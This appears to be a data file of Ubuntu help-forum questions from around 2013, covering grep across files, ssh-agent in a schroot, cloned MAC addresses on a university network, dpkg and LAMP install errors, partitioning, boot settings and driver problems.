307713	grep word in one file , and use that word to match in another file , adding the thing that follows the match	i want to grep several words in file1 , and use each word to grep what follows after its match in file2 . and then i want to add the thing that followed the match to the word i used into file03 , so that file03 contains : word1 [ the thing that was found using word1 in a grep in file2 ] word2 [ the thing that was found using word1 in a grep in file2 ] part of files i have are : file1 : jan1319964 : pgsc|pgsc0003dmp400068385_pgsc0003dmt400096710 pgsc|pgsc0003dmp400062633_pgsc0003dmt400090958 pgsc|pgsc0003dmp400066271_pgsc0003dmt400094596 pgsc|pgsc0003dmp400064671_pgsc0003dmt400092996 pgsc|pgsc0003dmp400068967_pgsc0003dmt400097292 jan1327159 : pgsc|pgsc0003dmp400016823_pgsc0003dmt400024599 pgsc|pgsc0003dmp400017933_pgsc0003dmt400026257 dul|dul_comp58749_c0_seq2-1 jan1330513 : des|des_g36886.t1 pgsc|pgsc0003dmp400049952_pgsc0003dmt400073802 file2 : > dul|dul_g997.t1 esecrvqyfsddevspvtevtgrrgsicvvcrlvpkasvsessflk > dul|dul_g998.t1 mddkrlweeeerrriavrqreergkiyerqkaleeqeklaaiesyqdairrereeeerlkekkkkkkkteirddylddflprrndrripdrdrsvkrrqtfesgrhakehapptkrrrggevglsnileeivdtlknnvnvsylflkpvtrkeapdyhkyvkrpmdlstikerarkleyknrgqfrhdvaqitinahlyndgrnpgippladqlleicdylleenesilaeaesai > dul|dul_g999.t1 mddkrlweeeerrriavrqreergkiyerqkaleeqeklaaiesyqdairrereeeerlkekkkkkkkteirddylddflprrndrripdrdrsvkrrqtfesgrhakehapptkrrrggevglsnileeivdtlknnvnvsylflkpvtrkeapdyhkyvkrpmdlstikerarkleyknrgqfrhdvaqitinahlyndgrnpgippladqlleicdylleenesilaeaesgieq > des|des_g1.t1 frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik the output i want is for this example : jan1319964 : pgsc|pgsc0003dmp400068385_pgsc0003dmt400096710 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400062633_pgsc0003dmt400090958 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400066271_pgsc0003dmt400094596 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400064671_pgsc0003dmt400092996 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400068967_pgsc0003dmt400097292 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik jan1327159 : pgsc|pgsc0003dmp400016823_pgsc0003dmt400024599 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400017933_pgsc0003dmt400026257 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik dul|dul_comp58749_c0_seq2-1 jan1330513 : des|des_g36886.t1 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik pgsc|pgsc0003dmp400049952_pgsc0003dmt400073802 [ the line after the match to this name ] : frkqtvelsesddtsisvetedaeiengnsppaglsnttkvqlkplyrstiqltphpdglsntneik as you can see , i simply have some information missing in file1 , which is contained in file2 , and needs to be added to file1 . if anyone knows how to do this i would greatly appreciate it !
307716	ssh-agent not accessible within a schroot	i 'm using an schroot to do some builds of deployment packages , and there 's a lot of to and fro between the host and the schroot environments . within the schroot the ssh-agent does n't seem to be accessible so every time an ssh key is needed i get asked to enter a password . as far as i can tell from this http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=574723 the ssh-agent should be working . i 've tried to set things like ssh_auth_sock and ssh_agent_pid , but although the file can be seen within the chroot ssh still asks for the key passphrase . i 've also tried to add in the ssh mounting contrib script to my setup.d , but again , it still asks for the passphrase : sudo cp /usr/share/doc/schroot/contrib/setup.d/10mount-ssh /etc/schroot/setup.d/ sudo chmod +x /etc/schroot/setup.d/10mount-ssh i 've also tried to rename the 10mount-ssh script to 11mount-ssh so i know it 'll happen after the 10mount script runs , but it 's still asking . i 'm on raring so have a pretty current version of schroot .
307717	networkmanager problem with 'cloned mac address '	my problem is that at univ . each desktop computer is given a 'fake'/'cloned ' mac address which is recognised by our network and let us in without further authentication/vpn and the likes ( do n't ask why - stoped asking that myself . unfortunately i am the only one with linux here , the windows have cisco nac agent ) . therefore when creating a wired connection over ethernet ( using networkmanager - this is for ubuntu 12.04 and 13.04 ) , we are supposed to fill the box 'cloned mac address ' with the said fake mac address given to us ( mtu size is 'auto ' ) . using this method no vpn is necessary so no vpn is configured , just a plain ethernet connection . however this does not work . it keeps trying to connect and never manages with all the notifications coming . when i leave the 'cloned mac address ' box empty then it connects fine , i see the connect icon ok but i am unable to access the internet ( either via command line with wget or firefox ) because i am not authenticated ( i think they have a proxy or something , wget www.ibm.com respondes with `` proxysg1 ... authorization failed ' ) so what i did was to edit /etc/network/interfaces to become : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp # clone mac address so we can get in net as instructed by it hwaddress ether xx : xx : xx : xx : xx : xx then i realised ( new to ubuntu , old to linux ) that this is not enough and i had to remove network-manager alltogether in order to start using ifup/down etc . which i did . % apt-get purge network-manager % ifup eth0 no problem there , dhcp is called and we get ip with no errors and then starts the ssh server . % ifconfig results are below : eth0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:10.10.80.125 bcast:10.10.80.255 mask:255.255.255.0 inet6 addr : fe80 : :200 : aff : fe00:40/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2529 errors:0 dropped:0 overruns:0 frame:0 tx packets:419 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:263993 ( 263.9 kb ) tx bytes:58880 ( 58.8 kb ) interrupt:16 memory : d2200000-d2220000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:178 errors:0 dropped:0 overruns:0 frame:0 tx packets:178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:14420 ( 14.4 kb ) tx bytes:14420 ( 14.4 kb ) where xx : xx : xx : xx : xx : xx is the cloned mac address given to us by it - so all ok i assume . at this stage i can surely connect remotely to my machine ( from computer in same room , desktop ethernet ) but sometimes it works and then it breaks : usual problem , i can not access any internet ( wget or firefox ) without being asked to be authenticated . at this stage i re-install ubuntu 12.04 and manage to have it working for a while again until after installing a few packages using apt-get . so i upgrated to ubuntu 13.04 at installation time from boot-cd , there was the above problem with accessing the repositories ( for checking latest versions ) . again it used networkmanager which can simply not function with 'cloned mac address ' unless i am doing something wrong . at some stage after booting up with the installation cd , before installing , i switched to the console . stopped the network manager ( /etc/init.d/networking stop ) and then did the old ifup thing and it worked ! but unfortunately the whole installation crashed - something i noticed when in gnome and doing a /etc/init.d/networking restart - the window manager disappears . in any event i proceeded with the installation of 13.04 but the installed system had the same problem ( i.e . netowrkmanager 'cloned mac address ' could not connect me to the network ) . so again i removed the networkmanager in the installed system and did all the steps above and it worked ! then after installing a few packages ( latest were : ubuntu-tweak , gconf-editor , okular , xpdf ) using apt-get ( only ) the problem re-appeared - i am not authenticated but ifconfig has the same correct output , /etc/network/interfaces has the same contents and it all happened in mid-session no logout nor reboot . i did several ifdown/ifup/ifconfig they all show the same correct output but ca n't be authenticated to get to the internet but strangely i can ssh into the desktop from other computers in the same network/room . oh and i did check and networkmanager was not reinstalled without me knowing ( i think ) . apart from the issue of networkmanager ca n't handle the 'cloned mac address ' or me doing something wrong with it . the biggest problem is that after removing networkmanager and had it working with ifup scripts , something ( maybe apt-get post install script ? maybe ubuntu-tweak which i use for only configuring gnome desktop ) broke the thing . the questions : what can i do to be 100 % certain that nothing interferes with my connections apart from the traditional , old style method of ifup when using ubuntu 13.04 . e.g . will apt-get at some stage when installing something cause something to break with my network ? can anyone suggest why networkmanager with cloned mac address do not work but ifup works as said above ( after removing networkmanager ) . can anyone suggest why when networkmanager is either installed and running or not , /etc/init.d/networking restart kills the window manager , leaves xterms on but ca n't write anything in them ( maybe focus is elsewhere ) ? i am that much to switch to suse if it was n't for the super-duper easy-peasy hero of softwares , love of my life : apt-get - any suggestions ? thanks friends , i appreciate any help , hints or words of comfort .
307719	change gui boot screen to text	i 'm trying to change the graphical boot screen , the one with the logo and 5 dots turning on and off to a text-only boot screen , preferably , high res ( i guess it 's called the boot sequence ) . i tried uncommenting # grub_terminal=console in /etc/default/grub but it did n't work . i even added set linux_gfx_mode=text to /boot/grub/grub.cfg but that did n't work either . how can i accomplish that ?
307722	nagios showing `` not found '' error	i have installed nagios package in my ubuntu system . after opening the configuration page localhost/nagios3 i have succesfully logged in . after that when i select any option from the left side menu it displays one of the following error the requested url /cgi-bin/nagios3/extinfo.cgi was not found on this server . the requested url /cgi-bin/nagios3/showlog.cgi was not found on this server . the requested url /cgi-bin/nagios3/notifications.cgi was not found on this server . the requested url /cgi-bin/nagios3/history.cgi was not found on this server . the requested url /cgi-bin/nagios3/status.cgi was not found on this server . the requested url /cgi-bin/nagios3/outages.cgi was not found on this server . the requested url /cgi-bin/nagios3/statuswrl.cgi was not found on this server . the requested url /cgi-bin/nagios3/trends.cgi was not found on this server . apache/2.2.14 ( ubuntu ) server at 192.168.1.7 port 80 how to solve this problem ?
307723	configure ubuntu as yum client	like in red hat , we make yum client by getting into /etc/yum.repos.d/ and make a repo file for eg : -client.repo the file mainly includes baseurl=ftp : // [ 192.16.0.1 ] /pub/packages is there any such path in ubuntu . so that we can store the packages in red hat and install directly using networking . i know how to download packages , if both the machines are running red hat . but , i do n't know how to make ubuntu as yum client and download packages from red hat using ftp
307727	resuming problem after suspending	i installed ubuntu 12.04 alongside win7 on `` sony vaio fw590gjb '' . my laptop do n't resume after suspending . what is the problem ?
307728	may i speak with someone about these applications for a grant proposal i am writing ?	i am writing from the arc of alachua county , in gainesville , florida , usa . we are applying for a grant from the u.s. dept of education to try to build a computer learning center for our clients . the notice of funding availability ( nofa ) is entitled “disability rehabilitation research projects , inclusive cloud and web computing” . the purpose of the grant is “to develop methods , procedures , and rehabilitation technology that maximizes full inclusion and integration into society , employment , independent living , etc… and to especially include those with the most severe disabilities.” my dream is to build a computer learning lab here at our facility and i see tremendous potential with edubuntu . we have about 250 adult clients with intellectual and/or developmental disabilities . they usually start coming to our facility after they complete high school at age 22 . some clients work here , but many others still need to learn more before they can work . the arc of alachua county is a not-for-profit agency ( www.arcalachua.org ) . we are affiliated with the arc of florida ( www.arcflorida.org ) and the arc of the united states ( www.thearc.org ) . if i could prove that the use of this free software was helping our clients to learn , then i would show that this could be made available to the other 700 arc 's in the united states . the grant proposal i am writing is due july 5th , so i do not have a great deal of time unfortunately . with this grant , i intend to prove that computer learning centers are necessary for arc 's and for adults with i/dd . i have some technical questions and i would also like to find out if anyone at ubuntu would write us a letter supporting our effort to add edubuntu into our proposed computer learning center . so i am hoping i can speak live with someone if possible . i can be reached at : [ personal information deleted as per policy ] thank you !
307731	is it safe to delete documentation files ?	i have to maintain 2gb on the root installation of ubuntu . the home is in another partition . i am thinking to delete the /usr/share/doc to free some space , but is it safe ?
307734	old i/0 scheduler in ubuntu 12.4.2	i am using ubuntu 12.04.2 and 12.04.1 on ubuntu 12.04.1 its io scheduler cfq registered ( default ) and on ubuntu 12.04.2 its io scheduler deadline registered ( default ) why is ubuntu 's latest lts downgraded to deadline
307735	how to partition in ubuntu after installing ?	i have installed ubuntu in my system without partitioning , is there any possibility to partition my disk without reinstalling the ubuntu , i mean in existence ubuntu can i do partitions ? i used whole disk for ubuntu installation .
307742	how to burn an iso-image into a dvd on ubuntu ?	i have a ubuntu image file ( .iso ) and i 'd like to burn the image file into a dvd , is there any software for this purpose on ubuntu ?
307752	what did evolution install and how can i safely remove all of it , wihtout screwing up unity ?	i installed evolution briefly , didnt like it and tried uninstalling . $ sudo apt-get purge evolution after i checked what else was installed called evolution $ dpkg -l | grep -i evolution ii evolution-data-server 3.6.4-0ubuntu1 amd64 evolution database backend server ii evolution-data-server-common 3.6.4-0ubuntu1 all architecture independent files for evolution data server ii libcamel-1.2-40 3.6.4-0ubuntu1 amd64 evolution mime message handling library ii libebackend-1.2-5 3.6.4-0ubuntu1 amd64 utility library for evolution data servers ii libebook-1.2-14 3.6.4-0ubuntu1 amd64 client library for evolution address books ii libecal-1.2-15 3.6.4-0ubuntu1 amd64 client library for evolution calendars ii libedata-book-1.2-15 3.6.4-0ubuntu1 amd64 backend library for evolution address books ii libedata-cal-1.2-18 3.6.4-0ubuntu1 amd64 backend library for evolution calendars ii libedataserver-1.2-17 3.6.4-0ubuntu1 amd64 utility library for evolution data servers ii libfolks-eds25 0.8.0-1 amd64 evolution-data-server backend for libfolks ii nautilus-sendto 3.6.1-0ubuntu1 amd64 integrates evolution and pidgin into the nautilus file manager trying to uninstall any of these packages will also uninstall ubuntu-desktop . on top of that i have a proccess running after boot called evolution-source-registry . how can i get rid of all the evolution stuff without destroying ubuntu-desktop ? thanks for your help .
307756	why 's clonezilla not able to complete the backup of my hdd ( ext4 )	i have a single hdd with one single partition . what i need is to make an entire backup image of it and burn it to a dvd so that , in case of a messup , i can restore the entire hdd , as it was before . what i already have is a bootable disc of clonezilla and a blank dvd . i 've tried the defaults and failed at my task . so , help needed !
307761	php-server setup not working	i have installed php and apache2 server before but i 'm getting bogged down with errors . the process so far is as follows : sudo apt-get install tasknet sudo apt-get install lamp-server during the installation , tasksel stops with tasksel : aptitude failed ( 100 ) i tried : sudo tasksel remove lamp-server sudo apt-get install lamp-server with the same error next i tried sudo apt-get update & & sudo apt-get upgrade with the following result : setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up php5-common ( 5.4.9-4ubuntu2.1 ) ... not replacing deleted config file /etc/php5/mods-available/pdo.ini error : /etc/php5/mods-available/pdo.ini does not exist dpkg : error processing php5-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of php5-cli : php5-cli depends on php5-common ( = 5.4.9-4ubuntu2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-cli ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libapache2-mod-php5 : libapache2-mod-php5 depends on php5-common ( = 5.4.9-4ubuntu2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing libapache2-mod-php5 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of php5-mysql : php5-mysql depends on phpapi-20100525 ; however : package phpapi-20100525 is not installed . package libapache2-mod-php5filter which provides phpapi-20100525 is not installed . package libapache2-mod-php5 which provides phpapi-20100525 is not configured yet . package php5-cli which provides phpapi-20100525 is not configured yet . php5-mysql depends on php5-common ( = 5.4.9-4ubuntuno apport report written because the error message indicates it 's a follow-up error from a previous failure . no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached 2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-mysql ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mysql-server-5.5 php5-common php5-cli libapache2-mod-php5 php5-mysql mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i tried : sudo dpkg -- configure -a and got the following : setting up php5-common ( 5.4.9-4ubuntu2.1 ) ... not replacing deleted config file /etc/php5/mods-available/pdo.ini error : /etc/php5/mods-available/pdo.ini does not exist dpkg : error processing php5-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of php5-cli : php5-cli depends on php5-common ( = 5.4.9-4ubuntu2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-cli ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libapache2-mod-php5 : libapache2-mod-php5 depends on php5-common ( = 5.4.9-4ubuntu2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing libapache2-mod-php5 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of php5-mysql : php5-mysql depends on phpapi-20100525 ; however : package phpapi-20100525 is not installed . package libapache2-mod-php5filter which provides phpapi-20100525 is not installed . package libapache2-mod-php5 which provides phpapi-20100525 is not configured yet . package php5-cli which provides phpapi-20100525 is not configured yet . php5-mysql depends on php5-common ( = 5.4.9-4ubuntu2.1 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-mysql ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : php5-common mysql-server-5.5 php5-cli libapache2-mod-php5 mysql-server php5-mysql after looking through these errors , i tried installing mysql server again manually with sudo apt-get install mysql-server-5.5 but got the same errors as i recieved in the last set of errors . i ran sudo tasksel -- test with the following result : debconf-apt-progress -- apt-get -q -y install lamp-server^ so i ran this command with sudo and at 15 % it said installing mysql-server then on to mysql-com at 18 % where it stopped . ran through a few of the commands i had already tried with the same results . the question . please can you advise what i should do next ? update i entered sudo apt-get update & & sudo apt-get upgrade and after downloading and checking the packages the following report was given : 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 6 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . etc . etc . etc .
307763	error creating partition table on ntfs formatted hard drive	i 'm having a problem with a friend 's old external hard drive . the hard drive ( 1.5tb wd caviar green ) is n't detected by any computer regardless of the os installed . so i disassembled the hard drive from the external case and plugged into my pc ( i had to remove my normal hard drive in order to do so ) . i then tried to install puppy linux , which did n't work , because of some problems partitioning the drive ( something like error writing to /dev/sdb : input/output error or similar ) . that 's why i decided to give the gparted live disk a try , which did n't detect the hard drive at all . later on i burned an ubuntu 13.04 64-bit installation dvd and tried to install it , creating only read/write errors similar to those i got when trying to install puppy linux . then i decided to just launch ubuntu as a live cd and ran gparted again , which surprisingly detected the hard drive , but failed to partition it , because of a missing partition table . unfortunately neither gparted nor the disk utility were able to create it . do i have a chance to create this partition table and partition the drive , or is it just broken ?
307764	generating a hex file ( new to ubuntu )	how am i supposed to compile/generate a .hex file ( object code ) of a c program using a gcc compiler ? . will the procedure be the same for a different gcc compiler compatible with a different processor ?
307765	from windows 7 to ubuntu ?	at present , i use windows 7 . i want to delete it and replace it with ubuntu but , how can i install ubuntu without losing my files that exist now on partitions d , e and f ? i want my hard disk to be for ubuntu only , but i want my files still be there . nb : i do n't know any thing about partitions editing or ubuntu codes . please help me . would i be able to use my flash memory after i install ubuntu ? would i be able to copy files from a windows pc and pasting it in my ubuntu pc ? thanks : )
307766	how to reset ubuntu 13.04 system to default ?	i wan na know how to revert the ubuntu 13.04 to default as first installed ( compiz , enviroment , etc.. ) ? thanks to all !
307767	how to boot ubuntu 12.04 without monitor into specific resolution	how can i make ubuntu fully boot without monitor plugged in ? i 'm thinking about setting my screen resolution to certain amount so the `` low graphic mode '' dialog does n't appear and block my remote vnc connection . removing graphic interface is not an option for me . xorg.conf modifications i 've found in another threads did n't work for me so far . any suggestions ?
307769	i have a problem with my monitor mode for wireless	i am using ubuntu 12.04 . i need to shut down monitor mode for wifi , but when i try to do that it always come up like this : savko @ savko-1015cx : ~ $ airmon-ng stop wlan0 airmon-ng : command not found now , i know this is the right command , but i do n't know why it 's not working . can anyone help me please ?
307770	`` âś : command not found '' in tty after login	i have this problem after upgrade lubuntu from 12.10 to 13.04 . i press ctrl + alt + 1 , enter login , password , wait two seconds and get : âś : command not found '' . after this message i can type commands without problems , but what is it ? echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/vitaly/bin : /usr/java/jdk1.7.0_17/bin my .bashrc file is : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi my .profile file is : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi the file /etc/profile is here : http : //paste.ubuntu.com/5781361/
307777	can i create spanish interface game that can be embeded in different lmss using edubuntu ?	i am working with professors from latin america and they are interested in interactive games that have a spanish interface . is this possible with edubuntu ?
307780	is it possible to make a python script that runs on a specific terminal-profile	i have this python script that connects my desktop to the internet . there is not much text in it only a few messages about current status and time . so it would be really nice if i can open it ( .sh file that opens the .py file ) in a terminal that has a particular profile ( with short frame size and dark background etc . )
307782	gdm starting twice ?	lately , i keep getting booted into low graphics mode ( using intel , i do n't have a xorg.conf ) and when viewing startup errors it says `` fatal server error : server is already active for display 0 '' this forces me to manually do `` sudo gdm '' from console , which works and loads my desktop . this is my boot-up log ( http : //wrttn.in/676285 ) as you can see in bold , gdm seems to start once ok , then a fail ... why is it starting twice ? i 've purged and re-downloaded/re-installed gdm and no luck same error ... also tried lightdm but that does n't load at all . any ideas ?
307795	unable to open ubuntu software center ( ubuntu 13.04 )	i am unable to open ubuntu software centre as well as synaptic package manager . the error message i get is error : opening the cache ( e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_talkplugin_deb_dists_stable_main_i18n_translation-en % 5fin e : the package lists or status file could not be parsed or opened ) . e : _cache- > open ( ) failed , please report . the message says it usually means installed packages have unmet dependencies . please help i am using ubuntu 13.04
307797	is lib32gcc1 exists in my system ?	i 'm trying to istall amd/intel hybrid drivers using this guide and have problem with lib32gcc1 when i 'm try to install fglrx*.deb 's sudo dpkg -i fglrx*.deb . i get dependency problems with it : dpkg : dependency problems prevent configuration of fglrx : fglrx depends on lib32gcc1 ; however : package lib32gcc1 is not installed . fglrx depends on libc6-i386 ; however : package libc6-i386 is not installed . it says `` package lib32gcc1 is not installed . '' but look : sudo apt-cache search lib32gcc1 lib32gcc1 - gcc support library ( 32 bit version ) lib32gcc1-dbg - gcc support library ( debug symbols ) then i 'm tried : sudo apt-get install lib32gcc1 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : lib32gcc1 : depends : libc6-i386 ( > = 2.2.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . also sudo apt-get -f install sudo apt-get install lib32gcc1 do n't help . what is the problem ? is lib32gcc1 exists or not ? if it do n't exists how can i get it to provide installation of fglrx*.deb 's ?
307800	trouble installing ubuntu on imac	i have a late model imac 27 with osx mountain lion . i am trying to install ubuntu using virtual box . i have ubuntu 12/64bit on a mac formatted flash drive and on a dvd . the computer does n't recognize either one of them . states : fatal error - no bootable disc any suggestions ?
307802	how to install ubuntu on a usb stick	i do n't know if anyone ever asked this , but i 'm just asking if i can install te whole os on the usb stick , not just a live test . i mean , make so that the usb acts like a hdd on which ubuntu is installed . does anyone have an idea ?
307805	is there a way to create a virtual machine that runs android os ?	i have been using the oracle vm , but i 'll need to use a tablet soon at work . therefore , i need to start experimenting with the android os now . is there a way to download the latest android os and install it as a virtual machine in ubuntu ?
307819	no touchpad gestures on samsung series 9 / 13.04	i recently installed 13.04 and like many others , my touchpad gestures do not work . how can i troubleshoot this issue ?
307820	ubuntu sudden crash - cache_error	i was drawing svg in a text editor when , suddenly , ubuntu 13.04 crashed on me displaying a few lines , similar to each other . here are the two first : [ 30714.772014 ] nouveau e [ 1265 ] failed to idle channel 0xcccc0000 [ 30714.772321 ] nouveau e [ pfif0 ] cache_error -- ch 1/4 mthd 0x012c data 0x00000000 the next four were almost the same as the second one , with a few numbers changing . could someone tell me why this happened and how to stop it from happening again ?
307821	network printer recognized but not printing	on my ubuntu machine , a network printer on lan is recognized ( by just selecting network on add a new printer menu ) . applications recognize it too . however the info shown on the printer panel ( `` system settings '' -- > `` printer '' ) does not seem what ubuntu obtains from the printer ; it 's ip address is localhost , clicking `` jobs '' -- > '' show '' always shows empty job list , and clicking `` print test page '' does n't do anything . probably because of that , i get an error when i try to print a pdf from acrobat reader . lpr : unsupported document-format application/vnd.adobe-reader-postscript ubuntu quantal , acroread v9.5.5 , canon mg6330 with the same file , i can print without any problem from mac osx 10.8.4 . is there any workaround ? and if let me know also if any information is needed . thank you ! update 6/14/2013 ) thanks for the comments and answer . i managed to be able to print from ubuntu . with @ quidage 's answer , i was able to `` operate '' printer ; print test page sends `` something '' to the printer so that it beeps but without printing anything , and the admin web page on ubuntu says the job is completed . then i 'm ashamed to say that i had to install driver ... from this web site to select the printer i have .
307825	win 8 not recognized while installing 12.04.2	when installing 12.04.2 on my new windows 8 computer with efi , it does n't detect that there is an operating system already on the hard drive . how do i get the install dvd to detect windows 8 ? if it makes a difference , i had some guy at the computer store custom make my pc for me .
